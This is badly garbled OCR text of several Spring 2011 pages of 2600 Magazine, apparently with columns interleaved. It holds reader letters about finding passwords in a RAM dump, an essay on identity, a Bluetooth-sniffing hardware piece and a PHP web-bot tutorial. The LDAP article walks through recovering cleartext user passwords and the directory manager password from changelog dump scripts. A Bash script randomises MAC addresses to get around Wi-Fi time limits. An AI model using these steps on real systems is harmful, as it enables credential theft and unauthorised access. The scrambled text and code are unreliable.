the next time I saw my instructor. this particular instructor is not only a security instru ctor. I'm glad to have found a community that I can relate to and that is willing to listen . or security types decrying storing lots of personal information in the cloud. didn't use the information for my own personal gain. they would have a coronary. often by cookies or session variables. kylew Dear 2600 : Geek Squad is still on the loose ! I read the back issue (25:2) article on the Geek Squad's lousy security.". However. Some classes used TestOut as supplemental material for the course . I was threatened with possible expulsion and prosecution .passwords .I am silting here read ing your grammar response in 27 : I . and didn't get into any actual trouble. I am currently trying to educate all the people I know through my small tech repair business. such as Securiry« . Some attacks trick a system into running code performing higher level tasks . I logged into the different accounts (which were mine) and then dumped the RAM into a text file so I could see what passwords) could find in clear text. we have j Page 46 2600 Magazine Spring 2011 Page 47 . and to this day has everyone else on campus thinking that I'm some kind of scheming hacker who's up to no good. a rather typical one . TestOut would request your login information and instead of sending a hash to the server to authenticate. or. TestOut is basically video courseware to help people prepare for certification exams. I think that if a spelling/grammar teacher read that short paragraph . I think they're forgetting the questions we should really be asking: What is privacy? And if it' s a guard to protect evil people from our personal information. But it serves to emphasize how the so-called experts oftentimes have no clue. but it was pretty-stupid . The Geek Squad has not changed their ways they still use passwords when on house calls and they open all their custo me rs to having their credit card numbers stolen. a career ofhacker motivational speaking is launched.and clamoring about something that is so meaningless like baseball. He ended up ima gin g the hard drive from the computer I used to examine it for any hacking tools. let's look at Internet security in general. you can do it. Advice Dear 26()(): My message for every hacker out there is to change your passwords as often as possible. thanks for the opportunity to vent. in pertinent part . Bravo! drlecter Dear 2600: I am acutely embarrassed to admit that my message excoriating Adam for his misunderstanding of the basic grammatical rules regarding agreement in number of the subject and predicate of a sentence included a glaring example of disagreement in number of the SUbject and the predicate of a sentence .. his definition is qu ite different than mine. and filters designed to constrain what data a system will allow. or. Analyze that ? I often wonder if I am ju st overreacting. the whole th. Anyhow. or trying to fool a system into thinking you should have more access. unfortunately. "the 2600 staff members are . Now transpose these ideas into meatspace.eaks for example andean settle into their casual living room-based existence and post responses to a "3 Second Video" on YouTube? Then afterwards . not just so that you won 't be hacked. the server would send the login credentials back to the client and authenticate locally . as well as the passwords for default accounts the school used to administer TestOut. Even the most uneducated hacker could eas ily gain access to the ent ire Geek Squad's customer info database with a simple key logger and some basic social engineering. and reported it so that hopefully the problem could be fixed . Most of my friends that I talk to about this kind of stuff have no clue about what I'm saying and certainly no interest.r Words Dear 26()(): I have a question: "Besides the inordinate response to something as trivial as poor grammar . I can't quite grasp why they did this.... However. RWM Movin g on . Be contens having the truth and the skill on your side and don 't let this discourage you from continuing to be open and honest in what you discover. they were the user names and passwords for all of the instructors who used TestOut in their classes. it was clear what be meant by that . When I found my TestOut password.becoming for example . I provide a safe and secure style of fixing com puter issues where customers don't have to enter any kind of personal data.temporary armchair grammarians? Anyone irritated at all? I am . By the way. of someone else. Basically..") found a command line application that dumped the contents of RAM into a text file for analysis. While I do consider myself a hacker. but because it helps to improve memory and learning ability in the long term. I want to encourage all readers of 2600 to spread the word about Geek Squad's security hole and to encourage others to turn to more secure ways of fixing their tecbnology. flags on cookies limiting who can access them . and laughing out loud . Change your passwords constantly. This story is . byaestetix I've been hearing a lot of discussion on how we 're losing privacy. and keep different sites ' passwords distinct. The first words to come out of Dis mouth were "Sounds like you've been hacking. Maybe it comes from the anti-Facebook pundits who are upset about their settings. but ugly). Network-s. Back [0 my story. and an application we used called TestOut. The sentence. You are a Hacker. etc . but the subject piqued my interest and I decided to do what my instructor likes to call "discovery learning. I decided to "do the right thing" and. How many people have heard about Wikil.. and so on . Jane Doe And with that . I j Dear 2600. as do most forms of curiosity." (which is correct." What is it that would stir the people of today ? What could be written or shown that would knock people out of their recliners? We seem to live in a world where our fellows are in a schizophrenic state • inappropriately responding to the infuriating with ambivalence . what is the actual information they 're trying to get? Throwing the tinfoil hat aside for a moment. exploration. CCNA. In case anyone is not familiar. others involve assuming the identify. Almost every kind of hack or attack involves impersonating another person.. We merely discussed this and didn't go much into it in class.' Wh at is it that will truly outrage or even stir anyone today?' '' I remember growing up hearing this wonderfully clever saying: "The pen is mightier than the sword . leaving all of this information in RAM in plain text. all in a nice XML format.ing still bugs the hell out of me . I'd also like to point out that this instructor took full cred it for finding the vulnerability. "the 2600 staff is . Rather than relying on technical means. I logged into one of the computers and accessed a few online accounts including my email. I found a vulnerability. I was " found innocent" of any wrongdoing. All this after I showed him 00 two other machines exactly what I did and how the results are the same no matter what machine you run TestOut on. All of these boil down into different archetypes surrounding how an ideal system should operate.".. No . should have been written : "the members of the 2600 staff are . In the end . Lo and behold. or the anti-TSA travelers who don 't want to be searched. Many lines ofdefense come along against these attacks: stack protection built into compilers. Note that the period terminating the previous sentence is correctly placed because the quoted phrase ends with an ellipsis . No inaner how hard it seems to do.I noticed that there were other user names and passwords related to TestOut sitting in the memory dump." While normally I would say yeah. Grammo. Anonymous You certainly have our interest and sympathy. but is apparently a CEH and teaching the "hacking" class for the security program! WTF ! Well. And what I got in return were threats. That is the true hacker spirit. I told him about the problem .

w :directory manager pa ssword] -. we try to work with these patterns. If you think about it. emotional. But once you decode the changelog with the appropriate script. we'll also eventually be forced to accept it and adjust our worldviews accordingly. many complained and demanded that they get the cool techie badges . Search the usual directories for it (/usr/bin. One possible name is "cl-dump. as most directory installations have more than one LDAP server.. Whether it travels over the network in the clear or through SSL encryption is moot.. that which composes who we are. Now that you have the usernarne and password for the God account . If all else fails. even when a user changes their password. directory admins should consider removing or otherwise disabling the cbangelog dump script ifpresenl. Information like "they hang around this area " or "they have attended these talks" adds significant clout to learning more about who people are. This article is provided for security and educational purposes only. like those that add or delete users. this becomes much more difficult.0 "cn ~directory manager" -. When it gets to the directory server. This comes with an added cost: the more anomalies we can detect. and we learned a lot about bow people think. In fact. because it could be in different places depending on the distribution. and there's often no way to tell how long they've been there . -h 'IP address of LOAP serve r] -. and we can use tools to craft a more perfect world. for redundancy . When people are designing the perfect computer or the most secure system. I can make the strife of someone in another state or country my problem. or fall into their tracks ahead of them. For instance. in all honesty. /durnp scr i p t na me. One advantage of single-point user management in an LDAP directory is that you can enforce a global password policy. One of the goals we had was to see how much personal information people would give us if we promised cool visuals and fun statistics. but that's a big " if. Execute the script without any arguments to get the proper usage.to look at how people work. creative beings. and maintaining the same generalized set of interests . Your options.txt". and PRW. And remember that while tools are objects of manipulation. do a search for "changelog dump script" ooline. i f1 want. When we pull more people into the picture. but before being written to the directory as a hash. with the limited amount of information on the badge. husbanded by large groups which became large because of the trust we placed in them. Change to the directory that contains the script. 10 particular. none of us has a clue. People happily filled out forms we didn't even require. there's not much security around this ID and password." Be careful out there. Beware : if the LDAPsystem administrator is worth his salt. it's often easy to either predict where they will be on a given date and time. Communication theory in general is based on three precepts: my ability to formulate in words or actions an idea I have . On the other hand. and the password of the God account. The output is quite easy to read. But hasn't it always been that way? Hard to say. but when we ran out of "populated" badges. Further.. and events. but it's questionable how much of an influence it has on their personality now. and your ability to take my words and actions and interpret their meaning. you can recover the clear text passwords the users have typed by dumping the change log with utilities that are oh-so-conveniently included with the directory software. there's no shortage of choices. Also. of course. Spring 2011 . -. the LDAP directory must be able to check the plain text password the user has typed. and how we use it. Lightweight Directory Access Protocol (LOAP) directory servers are everywhere.. Rather than a local town or village. Bear in mind that these devices are tools. you can make all users pick a password of at least six characters. hitting the same few places for lunch. children have education. How will this play out in the future? Again. so we could track them? Do I believe that the data on the badge compose each person's entire identity? Of course not. So far so good. and weren't scared of them. you can force the user to change their password regularly (say every 45 days).. However. . For security. As I found out quite by accident. is that essay part of their identity? The answer is yes. or cn=directory manager. Once the script completes. etc. to check password features like this..P a g e 49 . the more we do detect. But changes 10 the LDAP directory. it's also quite scary. It can be something like cneroot. Alternatively. hospitals help people.. II WAP Directory Servers: ~ by Leviathan TMI! look at any custom utilities that do work on the directory. our environments have merged together in a way that.. We all live through habits. one uppercase alpha character. Gman . There is also the unfortunate possible of a digital hegemony of information. Look through the script for the looooong command lines and you'll usually find the God account and its password as arguments to that LDAP command. we carefully made the badge with a removable battery so people could wander the conference incognito.. there's nothing left to the imaginatioo . If you study the patterns of someone else. What is our identity? What are the vital pieces of information that an evildoer could grab and become us for a day? I think that's at the heart of all this scare. Realistically. I do believe it's futile to try to maintain the "old ways. scan for lines that look like this: unhaahed#user#password: rald3rs Even on the most insecure operating systems. Because we want to maintain a common good in general. do I have to change what 1 feel my identity is? A larger global community means more words. are usually written to change logs. not in terms of good and evil . Do I think that someone could have spoofed their badge to look like someone else? Yep. that's what [ call it but it is analogous to the root account on a "nix server. I want to stop that tangent and focus on the more important thesis : all of these topics dance around an inner core of identity. such as making sure people have jobs. the change log output will be written to the file "/rmp/outputfi le. in many cases it was possible to infer who it was. may be different. my ability to communicate it to you. If I can google sorneone 's name and discover an essay they wrote years ago. Here's a common usage of a typical dump script. . the dump script. In my experience. or cn=administrator. the user 's password is in the clear. Well. usually going to school or work at a set time. for instance. etc. or even 1851. -0 Itmp/outputfiJ~. we didn't know about them. I don't have to explain further. So how does this all play into modem day security? Is it true that one tiny piece of information could rapidly shape the public view of a given issue? Absolutely.pl". you can s . and we should think about how they could be used. The results were astonishing: an overwhelming majority handed over "sensitive" information like their phone numbers and zip codes of their home town . with at least one numeric character. you never see the actual password in clear text. From proprietary directories like Microsoft Active Directory and SunONE. Search your directory system for a Perl script with the word "dump" in it. I'm pretty sure nobody bas a sweet clue ." I'd actually suggest it's not far from the truth. While I think the American founding fathers set up our government system specifically to prevent paranoid overreactions. For starters. When dealing with mass communications. your activity will be logged and logs checked. All you need is the ability to connect to the directory server over IP. While 1feel the best approach is to experiment and be open-minded to whatever the world may bring . to open source projects like Fedora Directory Server and OpenDS. use your favorite text tool to scroll through the f Ie. they often forget that perfection is an illusion and paradox at best. Change logs are necessary for things like directory replication. The password will sometimes be embedded within. which drastically changes how we define ourselves. Makes sense.. all these bits of information are tendrils forming a suggestion of who someone probably is. I'd also advise caution . but rather as means by which to expand or contract our freedoms. and my opinion is that. and so forth. then: Page48 2600 Magazine Warning:"Fishing for user passwords can gel you in big trouble.). There's a famous book with a tagline that includes "ignorance is strength." and I think this is a good thing. or referenced to an external tile 00 the same system. but because we were not able to detect them. p . Shouts out to TomzilJa. it arouses suspicion and we might throw up alarms until we've concluded they are safe. only the bashes.. many of these perceived "threats" have been around since 1951. you should look for the changelog dump script. Nobody can fully know someone else's thoughts. Perhaps if we're forced to see that everyone is imperfect. because we all freak out at the unknowns.txt In tbis example. I think the real difference between 20 II and 1951 is in how much technology we have. actions. and in fact some people did. When someone falls outside of them. but they can attempt to piece together intention based on their own interpretations. the directory has 10 be able to process the unencrypted password . ri ght? In order to enforce at least one digit. a lesson Asimov taught us decades ago. lusrllocaVbin. use ftp to get the script from the directory server. I was involved in the RPID tracking badge deployment at the two most recent HOPE conferences. people are (in theory) thinking.

The lisl of open Wi-Fis is then sorted by qualify (sigpaJ strength) 10 get the best possible connection. the Wi-Fi device name is the ooe and only command liDe panlJDClcr.. c hanne l 'SlCHANNELISloop_ccun t er -il" e ssid "SlESSID( Sloop_counter -] I" and DHCPcooJigun.t step is downloading two simple files. Imagine if they told you they decided to edit the books because they found the content unsuitable. advertising. Microsoft Windows and the MacOS had as a default setting \be auto-connect to open Wi-Fis. bUI il docs nol test if the Wi-Fi is free (unencrypted.. Besides. on e t ry to get a Le ase dh cl ient -1 ·SD£VI Cr. go the next open Wi·Fi and test it. h e t ps : I/ ssls ites . The possibiIi lies of this type 0 f program being misused was also discussed It was talked about bow someone could block content without yOW" knowledge and the power \0 do so oouJd be abused. schools and businesses wiU do the same. 1.P a g e S l . So the auto conneet from the OS often does not get you online. so even if the initial data is recorded by a computllr. e.. you would probably get the feeling that someone was spying 00 you. If al least one file could be downloaded. we should be online. It's not a person watching you. there still could be somcone looking at it later... Using free Wi-Fi is good for going onliDe for free. or eermsof \JSIe. Ii oenscd under the GPL.. In an episode of Off The Hook. and many open Wi·Fi5 are offline or require a payment for the Internet access. So he <content edited>~...be same name set a lockfile before and is still running. TN sibuJlinn rvilJIotaco~: Despite the fBcts. GPRS. I found this way of thinking very interesting and would like to use it to examine many other things in the computer-related world.d Q !www....de/www. I made USB keys with Knoppix Linux. This connection is being tested in a loop every ten SCICOnds. I bope this aJ1icle shows bow mucb our viewpoint can change if there is a computer involved. when your own Internet connection is down.. £1 '5 a fair switcb considering they are both resources used to learn new information. And because on~ one of about 30 Wi-Fis is free. It's easy 10 bide \be fact that you are using a free Wi-Fi even when someone sees that you must be: online: You can simply plug B wireless USB modem and 53Y thai you are online with HSDPA. I find this fi ltering method won. Another disadvantage of the auto-connect from the OS is that it uses the hardw~ MAC. You can still actiVllle this property. you can add or remove Wi·Fi devices without problems.. If at lease h t tp s: // s sls i te s.. bUI for privacy it's bcocr 10 use a random MAC. After a few of these advertisernents. try 10 connect. so Wac ie .- 2600 Magazine (ound at: http://'''''''''''I . You go to the library (logging on to a computer and going online) and find parts of books bave been edited out (the websires that IuJve been ediled by the new "quilting" filter software) by the librari.s eld i enst and can be translated via GoogIc.orks with hoi plugging.. The MAC randomization is also good for free Wi·Fis with a lime limit. -h eml For users wbo can't use Bashscripts. This is the short descriptioo: First.... PIU3.e than ones thai block websilCS completely because they could be used 10 alter the meaning of a text.de / --Heft-Abo/Ausgaben/ 2 0 1 0/11 / Schlues . One pan ofGmail that some people do nOI like is thaI advertisements are sent based on yOUT email's content. because most open Wi-Fis are not free. reading eraails and news. The scripI ki lis the network manager 10 avoid double \ISIIge of 8 resource wh ich can't do thac. and with the randomized MAC.. or EDGE but Dol Wi-Fi. Sometimes the non-computer counterpan is quite simi lar 10 the situation involving a computer. g. online.ur: J believe that maoy people who cod up using the prognun wiJI not SIOC the harmful aspects. h tml One application there is downloading wilh a notebook in a closed briefcase. This library wouldn't last too loog running like this... this is really safe. It's unfortunale thai the MAC =OO: OS (SRANIXlM't61 : S (ran: \J : 2 ) : -'Slran:J:2}:Slran :S:2} :Siran:?:2} ifconfig ·SDEVICE" promisc ifconfig 'S ~~~ICE" hw ether $MAC This does nOI work with every adapter.J..e q 0 ) Important Update Last October.. so does that make it all right? I say no. and test if you are ooline. It's also good as a backup connection. And often you can't connect because there is a MAC I1lter or you are OUI of range.. So I made a free Bash sen pi..: can be then • dhcpcd with 20 s t i meout . I tested c....be scrip] in several shopping centers. The script and Ihe Knoppix does 001 store any files." fi.tioo type -P dhcpcd if IS ? . For maximum range and noise imrnunicy. which does not have this disadvantage and works faster than a man could.t 20 'SDEVICE" e lse ~ dhclient which make s only .magaz in. Some find Ibis an invasion of privacy. where the auto-connect script gets started by a boot script. 3 small Google logo.. 'S(APMACISloop_ coun t e r))' --.. the nc. I feel whal GoogJe does is a bil like spying and I don 'l think just because it is 00 the Internet it sbould be treated any differeDt than spying in real life. the company would choose wbat advertisements to send .. and railway stations and ie works. c om/ homepage/projects/wifi/stick_e " . say thai you go to a library and cheek OUI a book only 10 find words crossed out. Now. tile with byDGM In Freedom Downtime. who is going \0 take out a book thai reads: " Once upoo a time <content edited>. continue with the previous MAC randomizarion in thisendless loop. iI's oRen lime-conswning. The e-mail service provided by Gocgle is widely popular. Let's switch the computer with your home. the rate is set 10 I MbiI/s by iwc onfig "SDEVICE" rate 1M The next step is scanning for Wi·F is by iwlist 'SDEVICE" s ca nn i ng and parsing the ourput. If comparing 6 computer to a library still sounds weird 10 you. so thai no one can sec that Wi-Fi is used.. because the lime limil usually is based on the MAC. Than the MAC gets randomized by rane s (cat /pt"oc/ interr ap t s I .so surfing with this key Iell ves no traces. so you should cbeck it. the German journal Lima-Magarin publisbed an ankle widt Perl liOiplS which OpclU Wi-Ficonnections thai have a splash pagewith adver· tising and terms of usc. htm l The aUIO connect script bere has an additional endless loop over all Wj·Fi devices. people often look at the fWO situations completely differently. You go about your business in whal you think is the privacy of your house but then receive advertisements based on what you do there." With one finger close to the power Ourton or magic system key reques\. For the same reason il has a locldile function 10 llSSUJ"l: thai the script terminates i( 8 process with c. The article and cod... Most people would go 10 a librarian and ask wbat the problem is. I/!I \ 'I . md5surn) OIIC ONS lookup was S\lOClCSSfuJ.linux . If the program gets popular. Page 50 ..com/homepage/projects/wifi/ "'gall er iee. Spring 2011 . They feel safe knowing only a machine is going through their mail and decide then: is 00 reason to question it any longer.. If there is 00 next. I. Emmanuel Goldstein talks of what Kevin Mitnick's crimes would be wilbout a computer. A gallery with this USB key in action is here: https:// ssl sites.. true -random " . Now let's look at the issue of a machine watcbing you..com/homepaqe/ proJe cts/wifi/index .. (d efau l t 60) dhcpcd . and without barriers like a MAC filler). public places. let's say someone hid cameras inside your bouse.. GSM. If the connection gets lost.. Still..true-random .. They will probably sec it as a betterway to stop their kids from entering certain websites.Fi the !hat A ut omaRotf Usage ncxtIfstep isFree DNS servergoe an DNS \ by cbecking rwo we !P. TIu ~ Glib M'" wilh a ~ People who question lbis advertisemeol meLbod at first sometimes change their mind once they bear thai it is only a computer that ncads their email.hen you are far away from horneor your computer al school or work. A combination of my Bash scrip( and these Perl scripts would automatically connecllO free Wj·Fi and e$lablish c. Instead of a computer ..tic ofifcooiig then showsWi. TM sitatJlioIt 4f i1 b 1101" with II co. every computer/machine bas an operalor. If they thoUghl along the lines of this asticle... 501DC people think the computer and Internet are private places. llaws of a system like this would be more widely noticed ifil wasn't just related 10 computers ..cring program thai II:IeS "qui ItiD g" methods Wllll discussecl This "quilting" method was said to edit out the inappropriate content on a page while leaving the suitable content undisturbed.bc Inlernet aoccss without a splash page.t~ue-random TM s:itu4Mfl without co"'PUlU1: Let's switch the computer with a library. BUI it's nOI easy: You have co go 10 a shop like Starbucks or MacDonaids (and buy something) or you have to scan for open (unencrypted) Wi-Fi. Then the script tries 10 connect with the association i wco nfig 'SDEVICE" mode manag ed ap . UMTS. The script and a description are at rcquesu. and doing other thiop . a type of 61t.. The gallery also shows sucb ~deoiable Wi-Fi.de/www. maybe they could come up with more reasonable solutions to the problems/debales computers bring. think oCthe librarian as the s~ adminiJilrator and the books as the content on the websites.arui (the adminillll'alor wbo is deciding what to block).. From the feedback.

sour ce-b lu et o oth-te st.$15 gets Ihe PCB. For network protocols. Of the ones willing to do smaller batches. and definitely affordable if you find a few friends to work on the project with you. Bluetooth is relatively harder to sniff than WLFi or ZigB. or boards which don't need more than two layers. and more eyes on something can only be: good. some ability to interface a radio of the appropriate type and protocol is needed. right? The key factor in being able to work on digging into a new protocol is being able 10 communicate with other devices via that protocol. which we can't easy get access 10. Since the beginning of the last decade. For perhaps the first time. com /2011/02/promiscuity. In practice. bUI comes with usage restrictions and doesn't provide source code. The next level of hardware hacking .. even bardware USB sniffing and complex tools like logic analyzers are available for under a hundred dollars. and the quantity of community development behind the Atduino is admirable. You can't sniff Bluetooth for $200. and I'd expect more 10 be forthcoming now thaI we have cheap tools. then segment the orders. We've finally crossed the threshold where cheap hardware is going to lei us do a lot more work with protocols which were closed to us before. unfortunately. RFID. assembled. runs a store where you can sell your design and buy the designs others have made public . this makes Bluerooth miserable to hack on. and rapidly moves between them.blogspot . The Arduino has probably done more to popularize hardware hacking than anything else in recent years. the skills needed to do eve" surface-mounI soldering are fairly easy 10 pick up. Thanks to the increase in homebrew electronics. there arc several groups who will collate a number of smaller designs into one large panel. I r 1 \' I " " II. htrnl) .. Why doesn't your Yaesu radio scanner tune to certain frequencies? Because it was easier to ban the sale of devices capable of intercepting analog cell phone frequencies than it was l() fix the protocols to be more secure in the firsl place. Yup.com/proj _ e c ts/mossmann/ubertoot h . though. Mike has already found a lot of inreresting attacks against Bluetooth (check out some of his talks from Sbmoocon and Toorcon). and small devices is well within the r. For making a number of devices. though.4 ZigBee protocols. especially compared to WiFi or even the relatively newer and less well-known 802. Fortunately. and Microsoft wireless keyboards. and another reason to attend cons! The first step. but in the last five or six years. By comparison. with the usual tradeoff of time VLTSUS money. Gel yourself three and cover the whole spectrum. another S80 or S100 would get you 3 GPS and a serial cable. The high cost barrier of entry to play with low-level Bluctooth has kept a lot of backers from being able to poke at the protocol. . and you were good 10 go. it uses a frequency-bopping method.t o o l/ . for the most part. there has been much less significaci research done on it. obviously. TIlls has finally been changing with the work done by Mike Ossman to introduce a low-cost home-brew radio device capable of sniffing Bluetooth." you don't hear about any significant hijacking of Bluetooth devices. bringing packet capture and injection on Bluetooth into the same price range as WiFi. a full panel is a fantastic option. fire up tbe code Travis ported from another open source radio project. Bluetooth is relatively unheard of in the vulnerability world. you can gel a full panel of boards.currently sold out and closing within 24 hours of this writing. or more recently the still thousand dollar or more USRP2 doing software decoding. such as those used by smarteards or other interchip communications. and delivered in about eight days for $120. u's a fantastic option. Fortunately. Ossman is proving this via Kickstarter (ht t p://www . What's the big difference? ls Bluetooth actually much more secure than WLFi? NOI really but you can't sniff Bluetoorh for $50. Simple boards can be etcbed at home. I'm actually feeling optimistic about some things in our field. aod even though almost every device out there says "Use !hI. There aren't maoy attacks for iL You can scan for devices set in discovery mode.com/). for example.o ne-an_ o p e n. When a Bluetooth device pairs.. nearly the same as with WLFi. you're still comrnined to a full panel. but multilayer and surface-mourn scale boards are probably not reasonable to tackle singlc-handedly. precut. there are plenty of completely open source tools which provide similar capability. The solution. Just about tbe only part of making complex home-brew hardware that can'l (realistically) be = tackled at home is the PCB manufacturing itself. some type of interface must be built. and often with complete specs and board layout files so you can make them on your owo if you don't want 10 buy the assembled version.coincidentally the same radio chip used in the Nike iPhone exercise device. they probably immediately think of the Arduino . masI default to hidden. Many conferences arc using embedded microcontrollers in their badges as well . it establishes a random pattern which divides ihe spectrum up into 80 IMHz slices. Most PCB manufacturing plants arc only interested in larger runs of boards. WIth about as much difference in price.goldphoenix .x . lL!lCS 22MHz per channel). Cheap supply chains for custom hardware means we ~ now gel past the barrier to Bluetooth hacking and starting working with it directly. Even circuit design "training" is affordable now . WiFi bas a 101 of vulnerabilities.. The Arduino isn't the only chip in the game. It's an aniface of a greater drop in the cost of high-tech manufacturing and general tech availability. Using Gold Phoenix (http:/ /www. but the cost is often 100 high. free tools and tutorials 10 encourage more development. $85 and a PCMClA slot would get you a cheap Prisml or Orinoco card.spinning your own boards • has already become affordable. Bluetooth. this is simple: capturing and creating network traffic.15.justifiably so. Now you can go on Amazon and gel a card an order of magnitude more capable and sensitive for $40. overlapping WiFi channels.lngeofindc- pendent hackers.is-nl:f241 01 s-du t y. is in designing the board. using "crowd sourced" (much as I hate Ihal term) funding to build a fairly significant quantity of radio boards capable of interfacing with Bluctooth . smartcards. and sniff wireless keyboards real-time (http://travisgoodspe ed. researchers. Even without community funding. and then have that panel manufactured. and $100 gets a fully populated. a Chinese manufacturer. the additional shipping costs.pcb. b i z/).as affordable as free.kickstarter . Grab some of the new hardware and gel hacking.The Next HOPE used the TJ MSP430 rnicrocontroller and the Nordic RF 2Aghz radio chip . power-efficient. or when lime is a critical factor. 'I " Page 52 2600 Magazine Spring 2011 PageS] . You only pay for the amount of boards you need. when YOU'fc on a light budget or 001 sure if your design will work and you need a handful of quality boards. that's right. of course. you can probably fund your project by selling completed boards at a markup to compensate for your time.. and tested unit.Cafe Press for circuit boards! The only thing that isn't easily automated for custom hardware is the placement of components and soldering. always really easy to do. BatchPCB (http:/ /bat chpcb. the cost of developing high quality. and you need Co wait until enough people have submitted orders to make up a full panel. Even PCB prinling is surprisingly affordable now. There are probably as many circuit board layout tools as there arc word processors. There arc small-batch pick-andplace automated facilities. The chances of two devices colliding arc much less than the wider. Here's a change of pace. but check for more in the future). or simple legislative protection to hide poor design. Besides. companies selling parts and components have a business interest in providing good. rarity of hardware. On the free side of things. Sniffing WLFi has been. One site. Sniffing WiFi is easy. Solder some USB headers onto your 1NH badge. this allows more Bluetooih nerworks to exist in the same space. Still. A hundred and twenty dollars! For smaller runs of boards. DO one would ever break the law when they want to clone a cell phone. with the tutorial videos online and the classes run at hacker spaces and conferences. and ship them back 10 the original customers. thanks 10 online tutorials from SparkFun (and general tutorials on You'Iubeat large). The barrier for entry to sniffing Bluetooth has typically been either a multi-thousand dollar commercial development system which can analyze the device you're producing. Eagle is very popular and has 3 fairly complete set of parts preconfigured in the system. but typically you'll spend more time laying out CUSl()m parts and footprints. The channel changing and configuration is handled by the low-level hardware. and enthusiasts. and if you're really good at it. KeyKeriki. There's some amazing new opporumities for research into protocols which were completely opaque to mosl of us without corporate budgets. PIN 0000 or 1234. For other protocols. making small quantities of custom boards should be within the budgets of many hackers. because instead of using a contiguous range for each channel (WLFi. With fewer eyes on it. In general.another protocol showing sigmficamly interesting possibilities which was inaccessible due to lack of affordable tools. bUI you also pay for the lime needed for someone to lay them out and panelize them. and every few months someone comes out with a new clever way to break Wifi. is to do some hardware hacking of our own. There are any number of well-known attacks against it. since each network uses a tiny slice of the bandwidth for a tiny fraction of the time. When people thiok about hardware hacking now.Transmissio ns In Drauorn . For wireless protocols. keyboards. roughly 18 by 24 inches. Too many protocols count on obscurity.

0 ) ~ . (0 this case.8 ~ccept-Lan guage: en-u5. and does sinister stuff.11.com/2600'). it spit out !be HTML code of the website hosted at I OJl www . Every programming laoguage bas some of Ibis stuff buill in. 404. Start with Something Simple With PHP.ec(). Sometimes websites use HITPS. which means everything is OK. these are separate domain names and could be hOICing separate sites) . but this lime with the host as www. com. The chird lioe is my user agent string. The next line is telling il thaI the host I'm looking for is 2600 . .l 301 Moved Permane ntly Date: Sat. $output = curl _ex ec<Schl: curl_c lose($ch ). or write a scrip! lhal downloads and stores everything from someone's web rnaiI account. so the Host header leIS the web :l<TVer Icnow which one you're interested in). .> lvovre H'TML :." textljavascript' '-srC='nav . bUI that's only because I'm a fan of WordPress. U. You pass cookies to the web server with the "Cookie:" besder. the OD1'1 way it knows thai you're still logged in the next lime you reload the page is because you send your cookie back lO the website as a line in the headers. here's the response my browser gal: HTTP/I . submits forms. html J h's ridiculously easy to spoof your user agent. download copies of web-based databases.1 Host: 26uO . .com/ ..! 200 OK Imor0 headers .. cam (somelimes the same web server bosls several different websites. php as long as '1011 have PHP and libcurl installed).6. just to be good. which means File NOI Found. Here's an example of a simple PHP scripl thaI checks 2600 '. -RE'I'URN'l'RANSFER. IlOd this rells thll web server some information aboul myself.3 . and if you're Bot familiar with these functions.C~ lm/2600.O . MSIE 6.. The rest of the lines aren't all thai important.'ht tp://twitter .2600. c om/bot. curl_ initO gets called and stores a b. thaI we want curl exec to return all the HTML code. J <html> <h e a d > <t itle>260 0: The Hacke r • Quarterly</title> . Sstart = serpos(Soutput. make a social networking worm.q=O . com . whicb means it has Moved Permanently.css' I> <link rel="alternate' type~ "'app1ication/rss~xml' title = "'2600 . www. but its user agent string looks something like th. -goog ". Other common codes are 200.26 0 0. coml wants me to redirect lO hetl-': / Iwww. especially if you want to do something like exploit an XSS bug.q=0.his one you can teU thai I'm using Firefox 3. xm l app l i ce t i on z . I'm primarily going 10 use WordPress as an example website that l'1I be anscking. it uses the HlTP protocol just like you and me. which is a very simple way that web browsers can communicate with web servers.en. These techniques can be used to exploit cross-sire scripting (XSSj vulnerabilities. curl_se topt($ch. and substr().more headers . CURLOPT. cheat in web games.. the server sends responses. com in the address bar. Other Firefox extensions thaI you might find useful are FireBug and Web Develeper Toolbar (useful for cookie management). 9.'\n").. This is important to understand because a 101 of bats you write might require you lO correctly handle cookies 10 do what you want. il includes a lor of header information.c ontent"> '.6.. and then stores everything returned into $OutpUL And lben the next line. :. c om/ Keep-Alive: time out~5. fake user agent string pretending we're using IE6. v. com. com User. curl_eJr. loading http://2600 . The first line is telling the web server' want everything in the root directory (I) of the web server.'text/css· hre(="nav.3l -Cecko/20l00401 fir e f ox/3. Run it either from a web browser (you need lO copy il 10 the web rool of a computer with a web server installed) or the command line (type php n1 enarne. -and store it in Soutput sch ~ curl_init. A IJOle about the user agent: It normally tells the web server whai operating system and web browser you're using.. It all runs over lhis protocol called HlTP. And if you're trying this OD more complicated sites.( compatible. il includes header information as well .6.2600. ~d e . and 500. And. I encourage you to look them up. <?php II ge t twitter . as one large string. and we set . that means it needs 10 redirect 10 there instead. 22 May 2 ~ l O -23:02:49 GfT Loca t ion: http://www.q~0. when we try 10 go to http ://2600 • . This staff will work against any website. and it responds: HTTP/I. curl _ setopt ( sch . CURLOPT_ "'USERAGENT. http://www.. curl_seIopt(). Send-Sstartl.1 (thttp://www.(). while looking like it's human. Intel Mac -OS X 10 .. the besl way lo write a web bol is 10 use the Curl functions. JI d i splay this tweet co the screen echo(trim($tweetl . Also. strlenO.I.Ss t a rt_string . it redirects to http://www . J To recap. here's an example. When google spiders a website to add pages to its search engine database.6. Google Analytics uses this to give website owners staIS about what computers their visitors use. I highly suggest using an intercepling proxy like Paros Of WebScarab.3) -Cecko/20l0040 1 Firefox/3. If my browser gets a location header in <I response. .xhtml . My browser sends requests. com and open up a connection lO it on port 80. 1 Host.2. $start). GET I HTTP/1.9. and the server returns some son of output based on IhaL Eacb time a browser makes an HlTP request. typed 2600 . which actually sends the HTrP request to http ://twitter. Try downloading the User Agent Switcher Firefox extension just to see how easy it is. it's important 10 know the basics of bow the web works.q=0. en-US.for t h e la t e s t tweet $sta r t_string : '<span -cla SS='entry . I used the Firefox extensions Live H1TP Headers and Tamper Data. from !. The Curl funCtiOllli 10 loIow arecurl)nit().xml.2 . The next block of code sear<:bes through the renamx! HTML code for the first tweet II uses very common string handling functions: strpos(j.. but the important one is the Location header. rv:l. One of their main uses is to keep persistent data about you in an active "session" as you make several requests 10the server. and the web server sets cookies in your browser with the "Set-Cookie:" header. I'll go through it line by line. and tcpdump an: great cools for any sort of network monitoring. A 101 of websites check ro see if the user agent says you're using an iPhone and an Android phone and then serves up a mobile version of the website instead of the normal one ... .byMkab Lee I'm going to explain how lO write code thaI automatically loads web pages.7. and web servers use this information for a bunch of different things. And then there are bots. ~: s II . en-US. and hil enter. especially ODes with lots of Ajax.I\gent: Moz i lla/S. When you login 10 a website. Basically. Intel Mac -OS 